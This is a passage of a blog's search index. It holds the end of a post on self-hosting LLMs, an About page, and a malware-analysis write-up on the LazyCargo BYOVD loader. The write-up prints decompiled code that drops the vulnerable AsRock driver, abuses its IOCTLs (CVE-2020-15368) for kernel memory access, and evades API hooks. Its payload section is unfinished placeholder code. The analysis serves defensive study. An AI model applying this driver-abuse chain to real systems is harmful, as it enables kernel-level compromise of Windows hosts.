offloading or splitting of the model in the hardware. These flags are what you use to control how the parallelism is setup. Another parameter controls the context window and memory reservation. The KV cache takes up a lot of space and grows linearly with context growth so you might have to limit the max context size or increase it from defaults if the hardware and model can handle it. You can also control the max amount of memory that can be allocated depending on how dangerous you want to play it. There is also the option to optimize the KV cache by effectively quantizing the cache to smaller precision.\nRuntime parameters are less about controlling performance and more about improving the output quality. An important parameter here is called temperature which effectively controls the randomness of responses. The higher the temperature the more \u0026ldquo;creative\u0026rdquo; the model becomes. Nucleus Sampling is another flag that enables a process the lops off the lesser probable options and another version of it just ignores tokens that are below a specified probability. Another section of runtime parameters control the response structure. One of them is a limit on the number of tokens one request will generate. You can also create penalties to stop looping situations with smaller models. Depending on the model this might not be a good choice as it might need to repeat itself internally for longer thinking but it can be helpful on occasion.\nThose are some of the general areas of control that you have access to although there are a lot more and depending on the engine their might be unique parameters. The bottom line is that the parameters are where almost all the optimization comes in once you have settled on hardware.\nLandscape of Inference Engines There are a lot of different inference engines that are free to use with the main ones being: llama.cpp, vLLM, MLX, and TensorRT-LLM. Each of them has different uses and optimizations.\nllama.cpp is the general worker that is built to run on all types of systems and hardware. It is the backend inference engine for ollama the common self hosting tool which handles downloading the models and other useful features. llama.cpp is also designed to run on consumer hardware ie the cheaper end of the spectrum where their are fewer of the hardware tricks in place. An important thing to note is that this inference engine runs GGUF models (the creator of llama.cpp also created GGUF). Due to it being made to run on more consumer hardware it has a lot of features and compatibility with sharding the model across the GPU and CPU. It has compatability with apples metal hardware API, nvidia cuda drivers, AMD drivers, and AVX-512 instructions. With this in mind llama.cpp is one of the best choices regardless of what hardware that is available.\nvLLM is a inference engine for better hardware. It runs AWQ / GPTQ / FP8 models and came up with paged attention. It also has great support for tensor parallelism as it is designed for much more compute then llama.cpp is focused on. Due to it being more for enterprise grade equipment it also has tool calling built into the engine with some very complex workflows that allow vLLM to run multiple tool calls simultaniously streamlining some processes. A feature of vLLM is that through some witchcraft it can store the KV cache in RAM instead of in vRAM allowing massive context windows to run with limited speed degration. One thing that vLLM doesn\u0026rsquo;t do is work well with offloading weights to the CPU due to that not being a focus for the tool.\nMLX is the inference engine developed my Apples machine learning team specifically to run LLMs on Apples hardware. This means for the most part that if you have Apple silicon this is the best option as it takes advantage of some hardware specifics. The main thing is the unified memory architecture that I talked about in the hardware section briefly. Due to both CPU and GPU using the same memory their is no need to copy any data from CPU to GPU instead just hand off the location of the data from the CPU to the GPU. This means that their is significantly less copying of data. It also uses something called Lazy evaluation which is essentially a process where instead of immediately calculating results it waits until you need to output to calculate it. This gives the engine more time to combine the instructions that it sends to the hardware to complete the operations leading to drastically reducing overhead on the GPU and keeps it more saturated allowing for faster results. Then there is the fact that MLX utilizes all the hardware to get the best results so the GPU, CPU, and ANE get used. Another thing that this inference engine has is the ability to train or fine tune models to your use cases which I am not going to cover here as that is a whole other can of worms I am still exploring.\nTensorRT-LLM is the MLX for NVIDIA. It designed to be very fast. If you have NVIDIA GPUs that can run it. Do. The quick overview is that it takes in the model and then optomizes it for whatever hardware you have through Automatic Inference Optimization and Layer Fusion. Through the Graph Rewriting and Specialized Precision Handling it is able to change the model to run the best on your setup in a pre-compilation phase. It also has great support for tensor parallelism and communication between GPUs. This is the inference engine used in NVIDIA based data centers for running cloud AI. It only runs on NVIDIA hardware.\nTo summarize the inference engine is responsible for the running and operations of the model. This is where the optimizations happen in self hosting because the right engine can use the hardware to the greatest effect.\nMCP \u0026amp; RAG Both MCP and RAG are tools you can add to your setup to enhance capabilities and improve results. MCP is a standard protocol that enables your LLM to operate within a system. RAG is a system to give your tool more context about the situation related to the prompt. Putting them together can lead to the best results when you want an LLM to understand the specific problem, be able to use tools outside itself, and make changes.\nMCP Components The MCP client is the component built into the chat interface that interacts with the LLM. The client\u0026rsquo;s job is to inform the LLM about the available tools, actually call the tool the LLM wants to call, and, if any information comes back from that call, inform the LLM of the output. It does this by simply inserting text into the prompt after you hit Enter, before it reaches the LLM. This text informs the LLM how to call tools; normally, the LLM outputs the text in a tool-call format, e.g., tool_get_data(). Depending on the tool used, the client then forwards the call to the MCP server. If the server has a response, it injects that text data into the LLM\u0026rsquo;s context window, effectively giving it new knowledge.\nMCP servers\u0026rsquo; job is to wrap a tool so it\u0026rsquo;s easy for the LLM to interact with. The server is an API for the LLM to use as a tool. When building them, remember to do so in a way that best suits the LLM (not in the standard API format). When the MCP client sends the request to the server, the server\u0026rsquo;s job is to run the requested command or function and then send the results back to the client to be injected into the LLM. This is the component that you configure when setting up MCP.\nThe integration of the client MCP server and the inference engine changes a little if the model is tool-aware, as it might put the data in a separate context window, but that is handled by the inference engine.\nMCP Best Practices Some things to consider when working with MCP servers. First, for most tools, there is already an MCP server available for you to use. I recommend running that through MCP-scan or proximity to make sure you are not installing malware. Additionally, many of them are not very good, and depending on what you want from the tool, it may be easier to build your own for the specific task you want the LLM to perform. If that is the case, keep these things in mind. Expose outcomes, not operations. Make it as simple as possible for the LLM to get the job done or the data it needs. This means creating higher-level tools that do more than a standard API function. Limit the tools you expose, as the more tools you have, the more context windows they take up. Ensure parameters are flat data types, i.e., strings and simple, so that the LLM has less of a chance to make a mistake when calling the tool. Constrain variables to enums so that the LLM has less chance of messing up the tool call. Use the docstrings of the functions to explain what the tool does in a way that an LLM can understand. Make sure errors return more context than just an error code, so the LLM can better understand what went wrong. Lastly, one of the most important things is to curate the data returned. Return only the relevant data instead of dumping massive amounts of JSON. Also, security-wise, make sure that you have limitations on what the AI can do so that it doesn\u0026rsquo;t accidentally delete your system.\nMCP Primitives Tools are the most well-known primitives in MCP servers. The server defines a tool with a name, description, and input schema (parameters). The LLM analyzes the description and, if it decides the tool is helpful, generates a call with the necessary arguments. The model chooses when to call them.\nResources are just documents that provide context to LLMs. This is defined information you might want to bring in when working with MCP. This can act similarly to skills in Claude code. The purpose is to provide the model with background information, logs, or file contents needed to answer a question. The front end chooses when to call them.\nPrompts are templates or workflows that you can define in your MCP server that users can call. The goal is to help users use the server effectively by providing pre-built instructions or standard operating procedures. If you find that prompting the LLM in a specific way gets the best results with a specific tool, you could add a prompt resource to speed up that process.\nTasks are in some MCP servers, and they are essentially a structure that goes beyond a prompt that is meant for long thinking and complex multi-step workflows. Tasks allow for tracking progress, pausing/resuming execution, and managing durable workflows\nWhat is RAG? Retrieval-Augmented Generation (RAG) is a technique that enhances the accuracy and reliability of LLMs by retrieving relevant data from an external knowledge base before generating a response. This helps address the AI\u0026rsquo;s lack of knowledge about the specific topic you\u0026rsquo;re discussing by augmenting the LLM\u0026rsquo;s context window with relevant information.\nThe typical RAG workflow involves passive retrieval followed by generation:\nQuery: The user asks a question Retrieval: The system searches a specific knowledge base for relevant text chunks. Augmentation: The retrieved text is combined with the original question into a single prompt Generation: The LLM generates an answer based on the provided facts rather than its training data. How does RAG work? Now the magic of RAG is in the retrieval process, which knows what is relevant to your prompt. The first step is to convert the data being drawn from and the prompt into a representation called embeddings. The embeddings are essentially dense semantic vectors that capture the sentiment of each data point. This allows semantic matching instead of just text matching, giving far better results.\nThere is a vectorized database of information you want the LLM to have available. Whenever a prompt is sent to the LLM, the RAG system will semantically vectorize the input and look for close matches in the database. Depending on the setup parameters, the results are then uploaded to the model\u0026rsquo;s context as data.\nAutomation There are several automation tools to help with building more agentic workflows. n8n is one of the leading general-purpose tools that allows you to build complex workflows with multiple LLMs working together. n8n allows you to build a decision matrix for a path that allows the LLM to choose what to do within the outlined options. This tool also allows different models to interact, allowing for the specialties of each model to be applied to the greatest effect. n8n can also be run with Docker, making it really easy to spin up and set up a test workflow. n8n is the general workhorse, so great for testing but not for optimization.\nLangGraph is another tool in the category of thinking tools. It creates a complex graph-based stateful multi-agent workflow, utilizing each model to its fullest. This tool is ideal for processes that require extensive thought.\nGumloop falls into the category of automation tools designed for high-volume, data-intensive processes. It moves large amounts of data across SaaS apps and supports MCP- and natural-language-based workflow building. Not a total fan, but it does a good job of handling a lot of data.\nThere are many other orchestration or automation tools out there that help build better, more advanced agentic workflows. Just give it a Google. I have not spent too much time picking these for my setup or researching them.\nOther Tooling LM Studio: Front end that can use either llama.cpp or MLX exo: clustering orchestrator to speed up results (Would use if clustering) openwebui: chatgpt-like interface for interacting with inference engine (what I use) opencode: terminal-based front end that has lots of cool features (what I use) Summary There are a lot of moving parts that, when done right, can all come together to deliver massive performance benefits. The largest improvements in speed or the ability to run larger models come from the hardware, but the software on top needs to leverage the specific tricks in each setup to achieve those results. The information I covered here is important for the next steps: picking the best options now, with knowledge of what to look for when running local LLMs.\n","permalink":"https://blog.lukasmay.com/deep-dives/ai-stack-part-1/","summary":"\u003ch1 id=\"overview\"\u003eOverview\u003c/h1\u003e\n\u003cp\u003eI have been looking into self-hosting LLMs, and this is my attempt to put everything I\u0026rsquo;ve learned about the subject in one place (so I can stop forgetting things). Alongside that, I wanted to include information about the setup I use to self-host LLMs on my laptop and the steps I took to build and optimize it. While that will come in the future, as there are still some things I am changing, and this is long enough already, I removed some of those parts to put in the next section.\u003c/p\u003e","title":"AI Stack Part 1"},{"content":"Introduction This is meant to be an outline of what I found while reversing the LazyCargo malware sample. This malware sample is one part of the five pipedream/INCONTROLLER malware framework components discovered by several cybersecurity firms and government agencies. The LazyCargo malware is a Windows dropper for another module in the framework. I don\u0026rsquo;t have access to any of the other components, so I wrote a payload to run the LazyCargo malware at the end of the analysis to verify my findings from the static analysis.\nI am going to skip a lot of the background on the pipedream malware framework, as this post is focused on LazyCargo, but I would recommend looking into the other components, as pipedream is the seventh known ICS-specific malware ever discovered, and lots of cool things are happening in the other components. I will first explain at a high level what LazyCargo does and then perform a walkthrough with code snippets of what I found inside the module finishing off with how I got the malware to run on a windows system with a custom payload.\nWhat LazyCargo Does LazyCargo is a Windows malware loader. It takes a payload and makes it run in ring 0 or in kernel space instead of user land. The way it goes about setting that up is with the mechanism Bring your own vulnerable driver (BYOVD). This is used to essentially create a vulnerability in the system by adding vulnerable software that operates in ring 0. Windows is smart enough to not let random code operate in ring 0 and for Windows to load a driver it has to be trusted or in other words signed. So the solution to this problem is find a signed driver that Windows will trust that is vulnerable so the operating system will load vulnerable code into ring 0. The next step in the attack chain is to then exploit the vulnerability in the newly loaded driver which in this case was AsRockDrv.sys which has this vulnerability: CVE-2020-15368.\nSo the exploit chain so far is to first to load the AsRockDrv.sys driver. Then register the driver with the system which starts the driver as a system service. The final step in that chain is to exploit the vulnerability which allows the malware to load the payload into ring 0 giving the payload kernel level permissions. There are lots of smaller steps that LazyCargo takes to make each of these things happen but that is the general overview of what and how it operates.\nStatic Analysis Initial Findings To start off with I ran the binary through string sifter which is a tool that uses floss to extract all the strings from a binary and then reorders them based on relevance to malware reverse engineering making the process of getting relevant strings much quicker.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 c:\\asrock\\work\\asrocksdk_v0.0.69\\asrrw\\src\\driver\\src\\objfre_win7_amd64\\amd64\\AsrDrv103.pdb C:\\Users\\User1\\Desktop\\dev projects\\SignSploit1\\x64\\Release\\AsrDrv_exploit.pdb Dhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0 2Terms of use at https://www.verisign.com/rpa (c)101.0, c:\\program files (x86)\\microsoft visual studio\\2017\\enterprise\\vc\\tools\\msvc\\14.16.27023\\include\\xmemory0 bcrypt.dll minkernel\\crts\\ucrt\\src\\appcrt\\string\\strnicmp.cpp C:\\AsRockDrv.sys \\REGISTRY\\MACHINE\\HARDWARE\\RESOURCEMAP\\System Resources\\Physical Memory \\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class ntoskrnl.exe Here are some of the top strings that string sifter was able to find. Right off the bat it is clear that something is happening with the AsRockDrv.sys as it\u0026rsquo;s listed in several different strings. Next their is repeated mentions of signing. bcrypt.dll is a Windows Cryptographic Primitives Library. ntoskrnl.exe is responsible for essential system services, including hardware virtualization, process management, memory management, and security reference monitoring. The registry keys also point to some sort of low level operations. Overall the main takeaways from a quick look at strings is that something is happening with the AsRockDrv.sys driver and what looks like components that will help load it.\nThe next tool that I run the binary through is capa. This tool essentially tells you the capabilities of a binary (Highly recommend). For this analysis I will just show the default output and how helpful it is when starting to look at a binary file.\ncapa-output Image\nATT\u0026amp;CK Tactics and MAEC Category This section maps the binary\u0026rsquo;s high-level execution flow to industry-standard threat frameworks, revealing its primary objective on the infected host.\nIt is a Launcher: The MAEC category explicitly identifies this binary as a launcher, meaning its core purpose is to deliver and execute a secondary payload rather than acting as the final stage itself. Service-Based Persistence: It ensures it survives system reboots by establishing persistence through the creation and modification of a Windows Service. Evasive Execution: It attempts to fly under the radar by utilizing obfuscated files and executing its processes through system services. Malware Behavior Catalog (MBC) The MBC breakdown highlights the specific technical behaviors the malware uses to interact with the system, modify files, and evade automated analysis.\nAnti-Debugging: The binary actively tries to detect if it is being analyzed by using timing and delay checks (specifically GetTickCount) to identify debuggers. Cryptography: It contains routines to encrypt and decrypt data, strongly suggesting the secondary payload or its configuration is encrypted within the file. System Reconnaissance: It actively queries the registry and searches for specific files and directories to understand its environment before deploying its payload. Detailed Capabilities This detailed list exposes the exact, low-level functions compiled into the binary, giving us a direct roadmap of its internal mechanics.\nEmbedded Payload: The scan confirms the presence of an embedded PE (Portable Executable) file, verifying exactly what the launcher is hiding. BCrypt Usage: It specifically relies on the BCrypt API to handle its data encryption and decryption routines. Debug Info: The binary is compiled in debug mode exposing their original local file paths, internal logging, and potentially the original source code structure. Which makes sense for why strings was as rewarding as it was. Dynamic API Loading: It links functions at runtime, a technique used to hide the true APIs it relies on from basic static analysis tools. At this point I have enough information to help me in understanding what might be happening inside the binary to open it in ghidra.\nMapping Control Flow The next step that I took was to figure out how everything that I had found up until this point was linked together. So I found the main function and started looking at the decompiled code to see what control logic was in place.\nNOTE: I have already gone through and renamed labels in ghidra.\n1. Ingesting the Malicious Payload The malware expects an argument (the unsigned driver) upon execution. It immediately opens this file, calculates its size, allocates memory, and reads the malicious payload into a buffer in user-space.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 // Ensures an argument is passed if (argc \u0026lt; 2) { printf(\u0026#34;please set unsigned driver as argument to program!\\n\u0026#34;); goto LAB_END; } // Loads the target file (the unsigned driver) HVar2 = OpenFile(*(LPCSTR *)(argv + 8), local_528, 0); hFile = (HANDLE)(longlong)HVar2; // Checks how big the file is and reserves RAM file_size = GetFileSize(hFile, (LPDWORD)0x0); vector_resize((longlong *)\u0026amp;UnsignedDriver_Vector, (ulonglong)file_size); // Copies data from disk to reserved RAM ReadFile(hFile, UnsignedDriver_Data, ...); Takeaway: The malware doesn\u0026rsquo;t contain the ultimate payload hardcoded within itself; it expects to load it dynamically from disk. This modular approach allows the attacker to swap out different malicious drivers without recompiling the loader.\n2. Dropping the Stepping Stone (The Vulnerable Driver) Once the malicious payload is in memory, the malware drops a second file to disk: a known vulnerable AsRock driver (AsRockDrv.sys). It writes this file directly from a hardcoded byte array (DAT_driver - bytes) embedded within the executable.\n1 2 3 4 5 6 7 // This creates the vuln Driver from the code of the payload _File = fopen(\u0026#34;C:\\\\AsRockDrv.sys\u0026#34;, \u0026#34;wb\u0026#34;); if (_File == (FILE *)0x0) { ... } // Writes the vulnerable driver to the C: drive fwrite(\u0026amp;DAT_driver-bytes, 0x8708, 1, _File); fclose(_File); Takeaway: This is the core of the BYOVD technique. Because AsRockDrv.sys is likely a legitimately signed driver (despite containing security flaws), Windows will allow it to be loaded into the kernel without triggering Driver Signature Enforcement (DSE) alerts.\n3. Establishing a Kernel Foothold With the vulnerable driver dropped to disk, the malware uses the Windows Service Control Manager to register it as a system service, start it, and then open a handle to communicate with it directly.\n1 2 3 4 5 6 7 8 9 10 // Start of the driver registration with windows hSCManager = OpenSCManagerW((LPCWSTR)0x0, (LPCWSTR)0x0, 2); hService = CreateServiceA(hSCManager, \u0026#34;AsRockDrv\u0026#34;, \u0026#34;AsRockDrv\u0026#34;, 0xf01ff, 1, 2, 1, \u0026#34;C:\\\\AsRockDrv.sys\u0026#34;, ...); // Loads the driver into the kernel BVar3 = StartServiceW(hService, 0, (LPCWSTR *)0x0); // Opens communication line via device symlink hDevice_AsRock = CreateFileW(L\u0026#34;\\\\??\\\\AsrDrv103\u0026#34;, 0xc0000000, 7, ...); Takeaway: The malware has successfully transitioned from user-space execution to having a functional, trusted communication pipeline (\\\\??\\\\AsrDrv103) directly into the Windows kernel.\n4. Payload Assembly and Exploitation This is where the actual exploit occurs. The malware concatenates a shellcode header with the unsigned driver it read in Step 1. It then finds the physical RAM address of a target IOCTL handler and uses a custom wrapper function (FUN_Driver - function) to send an IOCTL code (0x22e80c) to the vulnerable AsRock driver.\n1 2 3 4 5 6 7 8 9 10 11 12 13 // Assembles the payload: Shellcode header + Unsigned Driver memcpy(puStack_568, (undefined8 *)\u0026amp;DAT_140061b70, 0x7fb); memcpy((undefined8 *)((longlong)puStack_568 + 0x7fb), UnsignedDriver_Data, ...); // Locates target memory phyisical-address = find-physical-ram-addr(); // Exploits the AsRock driver to write to kernel memory local_548[0] = phyisical-address; FUN_Driver-function(0x22e80c, (undefined4 *)local_548); // Triggers the execution of the injected shellcode (*DAT_14006c740)(hDevice_AsRock, 0, 0, 0); Takeaway: The loader leverages a specific vulnerability (triggered via IOCTL 0x22e80c) in the AsRock driver to achieve arbitrary kernel memory write capabilities. It uses this to overwrite memory and manually map/execute the malicious, unsigned driver—completely bypassing Windows OS protections.\nExploit Specifics With a deeper look at the underlying functions, the true mechanics of how LazyCargo weaponizes the AsRock driver become clear. It executes a highly precise sequence involving physical memory scanning, payload encryption, and low-level system calls to achieve Ring 0 execution.\n1. Hunting for the Target in Physical RAM Before the malware can inject its payload, it needs to know exactly where to write it. The find - physical - ram - addr function handles this by using the vulnerable driver as a memory scanner.\n1 2 3 4 5 6 7 8 9 // Scans memory using a read IOCTL (0x22e808) Debug-check = FUN_Driver-function(0x22e808, (undefined4 *)\u0026amp;local_50); // Compares the read memory against a hardcoded signature if ((Debug-check == 0) \u0026amp;\u0026amp; (Debug-check = memcmp(pvStack_90, \u0026amp;DAT_140062370, 0xa0), Debug-check == 0)) { GetTickCount(); printf(\u0026#34;\\nfound map in %.3f sec physical address : %016I64x\\n\u0026#34;); goto FUN_no-debug-found; } Takeaway: The malware uses IOCTL 0x22e808 (which grants arbitrary physical memory read access) to iterate through RAM. It reads chunks of memory and uses memcmp to compare them against a specific 160-byte (0xa0 hex) signature. This allows the malware to dynamically locate the exact physical address of the target kernel structure or function it intends to overwrite, bypassing memory randomization protections like ASLR.\n2. Evading Detection with Encrypted Payloads When dispatching IOCTLs to the driver, LazyCargo doesn\u0026rsquo;t send its data in the clear. The FUN_Driver - function acts as a specialized wrapper that utilizes the BCrypt API (Windows Cryptography Next Generation) to encrypt the payload parameters.\n1 2 3 4 5 6 7 8 9 // Initializes AES encryption via Windows CNG NVar5 = BCryptOpenAlgorithmProvider(\u0026amp;local_b8, L\u0026#34;AES\u0026#34;, (LPCWSTR)0x0, 0); // ... (Key generation and buffer setup) ... // Encrypts the IOCTL parameters/payload before sending NVar5 = BCryptEncrypt(local_b0, pUStack_78, cbOutput-local_a8[0], (void *)0x0, (PUCHAR)0x0, 0, pUStack_78, cbOutput, local_c0, 1); Takeaway: By utilizing AES to encrypt the IOCTL buffer, the malware achieves two critical objectives: it satisfies the specific cryptographic input requirements of this version of the AsRock driver, and it actively evades Endpoint Detection and Response (EDR) solutions that scan memory buffers for known plaintext shellcode patterns before they enter kernel space.\n3. Bypassing User-Mode Hooks (The Trigger) To actually send the IOCTLs and trigger the execution, the malware actively avoids using the standard DeviceIoControl function found in kernel32.dll. Instead, it resolves the underlying NTAPI function directly.\n1 2 3 4 5 6 // Dynamically resolves the lowest-level user-mode API hModule = GetModuleHandleA(\u0026#34;ntdll.dll\u0026#34;); DAT_14006c740 = GetProcAddress(hModule, \u0026#34;NtDeviceIoControlFile\u0026#34;); // Later, the function pointer is used to send the IOCTL directly: (*DAT_14006c740)(hDevice_AsRock, 0, 0, 0); Takeaway: This is a classic user-mode hook evasion technique. Many security products monitor the higher-level DeviceIoControl API to catch malicious driver interactions. By dynamically resolving and calling NtDeviceIoControlFile straight from ntdll.dll, LazyCargo slips under those API hooks, ensuring its commands are handed directly to the kernel to trigger the final Ring 0 payload execution.\nSummary From our static analysis, LazyCargo paints a clear picture: it is a purpose-built, highly evasive BYOVD loader. By dropping the vulnerable AsRock driver, scanning physical memory for its exact injection point, encrypting its IOCTL communications to blind EDRs, and bypassing standard API hooks via NtDeviceIoControlFile, it methodically paves a stealthy path straight to Ring 0.\nBut static analysis only gives us the blueprint; dynamic analysis is where we prove it works. Detonating this malware wasn\u0026rsquo;t as simple as firing up a VM and watching it run. To truly verify my findings, I had to tackle the execution in three distinct phases. First, I needed to navigate the gauntlet of anti-debugging traps built into the binary just to get it to execute freely in my environment. Second, because LazyCargo acts as a reflective loader, I had to write and compile a bare-bones dummy driver to ensure the malware could actually load it into memory without immediately blue-screening the Windows kernel. Finally, once I achieved a stable load, I moved on to developing a more complex custom payload attempting the classic calc.exe pop to definitively prove that the injected code successfully executes with full kernel-level privileges.\nDynamic Analysis Debugger Traps While analyzing LazyCargo, I quickly realized that throwing this binary directly into a debugger wasn\u0026rsquo;t going to be completely straightforward. The developers left behind side-effects of their build configuration and included time profiling that can make debugging quite annoying. I\u0026rsquo;ve broken down the two main tricks I found that hinder the analysis process.\n1. Time Profiling A technique flagged during my capa scan was the use of GetTickCount. I tracked this down to the FUN_ai_find_physical_ram_addr function, which is responsible for scanning memory.\n1 2 3 4 5 6 7 if (local_58 == \u0026#39;\\0\u0026#39;) { GetTickCount(); if ((Debug_check == 0) \u0026amp;\u0026amp; (Debug_check = memcmp(pvStack_90,\u0026amp;DAT_140062370,0xa0), Debug_check == 0)) { GetTickCount(); printf(\u0026#34;\\nfound map in %.3f sec physical address : %016I64x\\n\u0026#34;); goto FUN_no_debug_found; } The malware records the system uptime immediately before and after its physical memory scan loop. While the primary purpose here appears to be calculating the elapsed time to print to the console, time delta checks like this are notoriously used to detect debuggers. If an analyst is manually stepping through this loop in a debugger, the time delta between the two GetTickCount() calls will be massive compared to a normal execution. This can inadvertently trigger anti-debugging behaviors if checked later, or simply alert the analyst that time is being monitored.\n2. Debug Build Artifacts \u0026amp; INT 3 Traps Interestingly, this malware sample was compiled as a Debug build. Because of this, it includes Microsoft Visual C++ runtime assertions (specifically _CrtDbgReport for std::vector out-of-bounds checks).\n1 2 3 4 5 6 7 Debug_check = _CrtDbgReport(2, \u0026#34;c:\\\\program files (x86)\\\\microsoft visual studio\\\\2017\\\\enterprise\\\\vc\\\\tools\\\\msvc\\\\14.16.27023\\\\include\\\\vector\u0026#34;,0x6c5,(char *)0x0,\u0026#34;%s\u0026#34;); if (Debug_check == 1) { var_int3_trigger = (code *)swi(3); (*var_int3_trigger)(); return; } If you are debugging the malware and trigger one of these bounds checks, the CRT will pop an assertion dialog. If you click \u0026ldquo;Retry\u0026rdquo; (which returns 1), the malware executes a software interrupt (swi(3)), which translates to an INT 3 instruction. This acts as a hardcoded breakpoint. If you aren\u0026rsquo;t expecting it or your debugger doesn\u0026rsquo;t handle the exception properly, it breaks the execution flow entirely and makes dynamic analysis incredibly frustrating.\nAnother thing that you have to get around is that the binary expects a payload. While you can skip over many of these checks it becomes increasingly hard when LazyCargo is trying to load the payload and it doesn\u0026rsquo;t find anything. This means to get the malware to run to completion I would need to give LazyCargo a payload that would not crash the system when loaded into the kernel.\nDummy Driver The dummy driver is the first attempt at this as I was not sure what was going to be needed. I started out trying to compile a binary that had the right metadata and structure and wasted a whole bunch of time trying to manually create what windows already had. Windows Driver Kit (WDK) is a tool that basically does all that for you. So I installed the WDK and build the first piece of code that when passed in as a payload did not crash my system.\n1 2 3 4 5 6 7 8 9 10 11 #include \u0026lt;ntddk.h\u0026gt; void DriverUnload(PDRIVER_OBJECT DriverObject) { DbgPrint(\u0026#34;LazyCargo Analysis: Driver Unloaded Successfully!\\n\u0026#34;); } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { DbgPrint(\u0026#34;LazyCargo Analysis: Hello World! The payload executed successfully.\\n\u0026#34;); DriverObject-\u0026gt;DriverUnload = DriverUnload; return STATUS_SUCCESS; } This was not the first attempt but this was the first payload I was able to pass in without it crashing the system. The Microsoft Driver Kit provides the build instructions so all the file formatting is done automatically along with providing the functions that are called when inside the operating system. The DriverEntry function gets called when the driver is first loaded. Passed into that are the driver object and a registry path. Then their is the unload driver function which is ment to remove the driver once it is loaded that way I could run this multiple times without having to worry about overlap besides the BYOD driver overlap.\nNow due to the way that the driver is loaded I can\u0026rsquo;t see the DbgPrint() so while the computer was no longer crashing there was no way to know if LazyCargo worked in the VM. So I continued building more complicated drivers to have definitive proof that it worked.\nCustom Payload I chose to try and get calc.exe to show up on the screen after running LazyCargo as this is a very common things for pocs in exploits. Turns out that this is a very complex multi stage process to accomplish from ring 0.\nI knew the file I passed in would need to have the proper structure, since LazyCargo acts as a reflective loader for the payload. Some shell code facilitates this, so I took a closer look at what it was expecting.\nThe shell code was expecting a standard PE binary file. This ment that I just had to create a standard PE binary file\n1 2 3 4 // Code examples here for (int i = 0; i \u0026lt; 10; i++) { printf(\u0026#34;%d, \u0026#34;, i); } Summary Not done at the moment.\n","permalink":"https://blog.lukasmay.com/projects/lazycargo/","summary":"\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eThis is meant to be an outline of what I found while reversing the \u003cstrong\u003eLazyCargo\u003c/strong\u003e malware sample. This malware sample is one part of the five pipedream/INCONTROLLER malware framework components discovered by several cybersecurity firms and government agencies. The LazyCargo malware is a Windows dropper for another module in the framework. I don\u0026rsquo;t have access to any of the other components, so I wrote a payload to run the LazyCargo malware at the end of the analysis to verify my findings from the static analysis.\u003c/p\u003e","title":"LazyCargo"},{"content":"About Lukas May Welcome to my cybersecurity blog! I\u0026rsquo;m a Junior at the Rochester Insitute of Technology (RIT) studying cybersecurity who loves diving deep into interesting technical problems and sharing what I learn along the way.\nA big part of my focus is OT security\u0026ndash;how we defend critical infrastructure like the electric grid, water treatment plants, or manufacturing systems. Through this site I aim to share my research and analysis of the cybersecurity and tech world.\nWhat You\u0026rsquo;ll Find Here This site serves two main purposes:\nDeep Dives: In-depth explorations of technical topics, research, and interesting technologies I\u0026rsquo;m learning about. Projects: Documentation of things I\u0026rsquo;ve built, including technical implementations and weekend experiments. Get In Touch The best way to reach me is through LinkedIn\nThanks for stopping by! Whether you\u0026rsquo;re here for the casual weekend project stories or the more formal technical documentation, I hope you find something useful or interesting.\n","permalink":"https://blog.lukasmay.com/about/","summary":"\u003ch1 id=\"about-lukas-may\"\u003eAbout Lukas May\u003c/h1\u003e\n\u003cp\u003eWelcome to my cybersecurity blog! I\u0026rsquo;m a Junior at the Rochester Insitute of Technology (RIT) studying cybersecurity who loves diving deep into interesting technical problems and sharing what I learn along the way.\u003c/p\u003e\n\u003cp\u003eA big part of my focus is OT security\u0026ndash;how we defend critical infrastructure like the electric grid, water treatment plants, or manufacturing systems. Through this site I aim to share my research and analysis of the cybersecurity and tech world.\u003c/p\u003e","title":"About"}]